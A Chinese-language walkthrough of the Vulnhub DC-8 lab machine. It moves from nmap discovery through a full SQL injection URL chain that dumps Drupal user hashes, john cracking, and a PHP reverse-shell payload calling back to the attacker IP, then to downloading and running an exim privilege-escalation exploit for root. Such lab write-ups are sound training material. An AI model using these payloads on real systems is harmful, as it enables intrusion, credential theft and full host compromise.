Vulnhub DC-8靶機滲透

信息蒐集

nmap -sP 192.168.146.0/24 #主機發現
nmap -A 192.168.146.146 #Enable OS detection, version detection, script scanning, and traceroute

點擊Detail的三個欄目，發現url變成http://192.168.146.146/?nid=3
測試一下存在注入，數字型注入

http://192.168.146.146/?nid=3'
http://192.168.146.146/?nid=3%20order%20by%201
http://192.168.146.146/?nid=3%20order%20by%202		#只有1列
http://192.168.146.146/?nid=-3%20union%20select%20database()  #庫d7db

http://192.168.146.146/?nid=-3%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database() #爆表

http://192.168.146.146/?nid=-3%20union%20select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27](http://192.168.146.146/?nid=-3 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') #爆列

http://192.168.146.146/?nid=-3%20union%20select%20group_concat(uid,%27%20|%20%27,name,%27%20|%20%27,pass,%27%20|%20%27,mail,%27%20|%20%27,theme,%27%20|%20%27,signature,%27%20|%20%27,signature_format,%27%20|%20%27,created,%27%20|%20%27,access,%27%20|%20%27,login,%27%20|%20%27,status,%27%20|%20%27,timezone,%27%20|%20%27,language,%27%20|%20%27,picture,%27%20|%20%27,init,%27%20|%20%27,data)%20from%20users](http://192.168.146.146/?nid=-3 union select group_concat(uid,' | ',name,' | ',pass,' | ',mail,' | ',theme,' | ',signature,' | ',signature_format,' | ',created,' | ',access,' | ',login,' | ',status,' | ',timezone,' | ',language,' | ',picture,' | ',init,' | ',data) from users) #爆字段

兩個用戶分別是admin和john（這裏估計是個提示，直接用kali的john爆破john的密碼）
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

步驟以下：
echo '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF' > pwd
john pwd --wordlist=/usr/share/wordlists/rockyou.txt  #密碼turtle

getFlag

接下來就是要找登錄頁面了，掃描一下發現robots.txt，訪問看看有什麼路徑和文件。

找到登錄路徑/user/login直接使用john登錄

瀏覽後臺找能夠寫php code的地方。
最後在contact us - webform中找到

箭頭指的話說了提交成功後顯示。那麼就在contact us頁面隨便填寫並提交，看到了phpinfo頁面。

老樣子反彈shell，滲透機nc -lvvp 4444

//網頁編輯器中的內容
<?php
$sock=fsockopen('192.168.146.132',4444);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('sh',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>

而後提交contact us便可獲得反彈的shell
python -c 'import pty; pty.spawn("/bin/bash")' #交互式shell

看看home目錄下的dc8user，嘗試切換用戶，不可行。

嘗試sudo提權sudo -l #不可行
嘗試suid提權find / -perm -u=s -type f 2>/dev/null

查看一下靶機的exim版本 exim --version #4.89

看看有沒現成的腳本 searchsploit exim

有個現成的提權腳本。
提出來到web目錄下，而後在靶機直接下載

root@kali:~# cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html
root@kali:/var/www/html# service apache2 start   #開啓apache2服務
www-data@dc-8:/tmp$ wget http://192.168.146.132/46996.sh  #靶機上下載
www-data@dc-8:/tmp$ chmod 777 46996.sh  	#分配權限
#執行的時候一直報錯

那就本身複製代碼，而後在靶機vi寫入文件試試。

#https://www.exploit-db.com/exploits/46996
www-data@dc-8:/tmp$ vi A1oe.sh   #而後按i ， ctrl-shift-v粘貼
www-data@dc-8:/tmp$ chmod 777 A1oe.sh   #分配權限
www-data@dc-8:/tmp$ ./A1oe.sh		#執行

# 查看幫助或者源代碼後直接使用
$ ./A1oe.sh -m setuid
$ ./A1oe.sh -m netcat   #提高爲root

好像若是不用交互式命令的話，過一段時間會自動斷開，那麼也能夠再反彈一個shell。

總結

此次玩靶機回顧了下最基礎的sql注入。。 學習了suid提權中的exim提權。